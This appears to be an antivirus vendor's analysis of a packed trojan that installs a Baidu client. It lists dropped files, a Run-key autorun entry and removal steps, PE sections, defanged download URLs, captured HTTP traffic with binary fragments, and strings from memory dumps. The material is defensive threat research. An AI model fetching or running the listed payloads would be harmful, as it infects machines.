%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\heavy-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\light-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.svg (4992 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-baidu1.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\AppHTMLXiaoXi.xml (440 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-radio-tooltip-png8.png (329 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\thundershower.png (898 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\CommonRes.rdb (74736 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\duststorm.png (811 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\enter.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\bookmark\bookmark.db (20 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\split_g.png (968 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\atl100.dll (10128 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\347.png (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\download.png (177 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\dataReport.js (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\pack.css (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\red_arrow_up.png (154 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\CheckerProxy.dll (10128 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\icon_resou.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\head-star-png8.png (450 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\severe-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\png8-dialog.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BDClientProxy.dll (45104 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\overcast.png (680 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\ala.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.ttf (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\sunny.png (856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-foward.png (156 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\light-snow.png (918 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\settings_z.png (11 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-top-center.png (122 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\res_gupiao.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\split_g.png (248 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Heartbeat.dll (14384 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\moderate-snow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\ssl-error.html (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\png8-login-success.png (824 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-back.png (154 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\kuaidi.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe (24048 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sand.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\settings\user_setting.db (24 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\blank_tab\new_tab.db-journal (512 bytes)
%Documents and Settings%\All Users\Baidu\BDCLProxy\10000302_130895171752697500.dat (314 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\stock.pb (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\CheckerExe.exe (63735 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\auto_complete\auto_complete.db (284596 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\bookmark\bookmark.db.bak (10 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\auto_complete\auto_complete.db-journal (5454 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\novel.pb (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\settings\default_setting.db (24 bytes)
%Documents and Settings%\%current user%\Desktop\百度.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\百度\å¸载百度.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\百度.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\百度.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\百度\百度.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"BaiduClient" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe -noclient"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: Soft
Product Name: ?????
Product Version: 5.2.1.0
Legal Copyright: Soft ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 5.2.1.0
File Description: dc CAD
Comments: ????
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX0 | 4096 | 2248704 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
UPX1 | 2252800 | 536576 | 534528 | 5.47189 | 1878ef6ce51cdfb4fdd621cc3b91633b |
.rsrc | 2789376 | 24576 | 24576 | 3.09822 | 001b173ba8ca5bdeefda647e026db3f3 |
Network Activity
URLs
URL | IP |
---|---|
hxxp://cnrdn.com/rd.htm?id=1384659&r=http://www.baidu.com/ | 42.156.140.191 |
hxxp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj1?public&code=855660852431bcf426a5bae830564ee1 | |
hxxp://brdlsw.jomodns.com/ditui/zujian/Baidu_Setup_1.6.200.359_ftn_1050103060.exe | |
hxxp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc1?public&code=6fdb767dabadc33d2d6d795070210423 | |
hxxp://dlsw.br.baidu.com/ditui/zujian/Baidu_Setup_1.6.200.359_ftn_1050103060.exe | 118.123.210.46 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /ditui/zujian/Baidu_Setup_1.6.200.359_ftn_1050103060.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dlsw.br.baidu.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: JSP3/2.0.13
Date: Sat, 17 Oct 2015 00:57:53 GMT
Content-Type: application/octet-stream
Content-Length: 6831104
Connection: keep-alive
ETag: "554c7256-683c00"
Last-Modified: Fri, 08 May 2015 08:22:46 GMT
Expires: Tue, 24 Nov 2015 10:30:54 GMT
Age: 5322419
Cache-Control: max-age=8640000
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................p.......B...9............@..........................P........i...@.................................d...........Hq............h..#...........................................................................................text....o.......p.................. ..`.rdata...*.......,...t..............@..@.data....~..........................@....ndata.......0...........................rsrc...Hq.......r..................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....-G..H.P.u..u..u.....@..K...SV.5.-G.W.E.P.u.....@..e...E..E.P.u.....@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h..F.W....@..u.W...u....E.P.u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ
<<< skipped >>>
GET /rd.htm?id=1384659&r=http://VVV.baidu.com/ HTTP/1.1
Referer: hXXp://cnrdn.com/rd.htm?id=1384659&r=http://VVV.baidu.com/
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: cnrdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/1.4.1
Date: Sat, 17 Oct 2015 00:57:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
186f..<!DOCTYPE html>.<html>.<head>..<title>CNZZ...............................................................</title>..<meta charset="utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />..<meta content="yes" name="apple-mobile-web-app-capable"/>..<meta content="yes" name="apple-touch-fullscreen" />..<meta name="keywords" content="cnzz,............,............,............,............,.........,......,............,............,......,............,seo,............,.........,.........,............" />..<meta name="description" content="CNZZ.........................................................................................................................................................................................." />..<meta name="author" content="cnzz" />..<meta name="copyright" content="www.cnzz.com" />..<link href="hXXp://VVV.cnzz.com/favicon.ico" rel="shortcut icon" />..<link href="hXXp://img.cnzz.net/adt/cnzz_rd/transfer.css" rel="stylesheet"/>.</head>.<body><script>.with(document)with(body)with(insertBefore(createElement("script"),firstChild))setAttribute("exparams","category=&userid=&aplus&yunid=&&trid=0a930d6b14450434725695389e&asid=AQAAAAAQnSFWbs2PJwAAAACoR 2/bGzDiA==",id="tb-beacon-aplus",src=(location>"https"?"//g":"//g") ".alicdn.com/alilog/mlog/aplus_v2.js").</script>...<div class="transfer">...<div class="transfer-inn">....<img src="ht
<<< skipped >>>
GET /fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc1?public&code=6fdb767dabadc33d2d6d795070210423 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.153.147.73
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 17 Oct 2015 00:31:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8zb mod_jk/1.2.31
Content-Disposition: attachment; filename="uc1"
Accept-Ranges: bytes
x-cdmi-object-size: 10222796
x-cdmi-create-time: 2015-08-20 15:47:19
Content-Length: 10222796
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream;charset=UTF-8
........W...list_soft.xml.......................................................................................................................................................................................................................................................t...bluebox.png.........................................................................................................................................................................................................................................................g...ucweb.png............................................................................................................................................................................................................................................................WO.BlueBoxSetup.exe....................................................................................................................................................................................................................................................PuX.Browser_V3.2.2937.0_f_4070_(Build14120411).exe.........................................................................................................................................................................................................................<?xml version="1.0" encoding="UTF-8" ?>..<Profile>.. <SoftwareList SuitLabel="............;............;">.. <Group GroupId="0" name="............">.. <Softw
<<< skipped >>>
GET /fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj1?public&code=855660852431bcf426a5bae830564ee1 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.153.147.73
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 17 Oct 2015 00:31:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8zb mod_jk/1.2.31
Content-Disposition: attachment; filename="7gj1"
Accept-Ranges: bytes
x-cdmi-object-size: 9894214
x-cdmi-create-time: 2015-09-21 09:04:14
Content-Length: 9894214
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream;charset=UTF-8
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_856:
%original file name%.exe_856_rwx_00401000_002A7000:
Windows 95 OSR2
Windows 95 SP1
Windows 95 SP1
Windows 95
Windows 95
Windows CE
Windows CE
Microsoft Windows Me
Microsoft Windows Me
Microsoft Windows 98
Microsoft Windows 98
Microsoft Windows 95
Microsoft Windows 95
Microsoft Windows 2003
Microsoft Windows 2003
Microsoft Windows XP
Microsoft Windows XP
Microsoft Windows 2000
Microsoft Windows 2000
Microsoft Windows NT
Microsoft Windows NT
KERNEL32.DLL
KERNEL32.DLL
%s
%s
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCArchiveException@@
zcÁ
zcÁ
perl.exe
perl.exe
63c37bf685e453975c01269.exe
63c37bf685e453975c01269.exe
cmd.exe
cmd.exe
263c37bf685e453975c01269.exe
263c37bf685e453975c01269.exe
x86 9.0.30729.4148
x86 9.0.30729.4148
c:\%original file name%.exe
c:\%original file name%.exe
GetCPInfo
GetCPInfo
GetWindowsDirectoryA
GetWindowsDirectoryA
WinExec
WinExec
GetProcessHeap
GetProcessHeap
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
GetViewportExtEx
GetViewportExtEx
GetViewportOrgEx
GetViewportOrgEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
ShellExecuteA
ShellExecuteA
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
SetWindowsHookExA
SetWindowsHookExA
UnhookWindowsHookEx
UnhookWindowsHookEx
CreateDialogIndirectParamA
CreateDialogIndirectParamA
.text
.text
.rdata
.rdata
@.data
@.data
.rsrc
.rsrc
(*.*)
(*.*)
Baidu_Setup_1.6.200.359_ftn_1050103060.exe_1308:
Baidu_Setup_1.6.200.359_ftn_1050103060.exe_492:
Baidu.exe_808:
1.6.200.359
CheckerExe.exe_2864: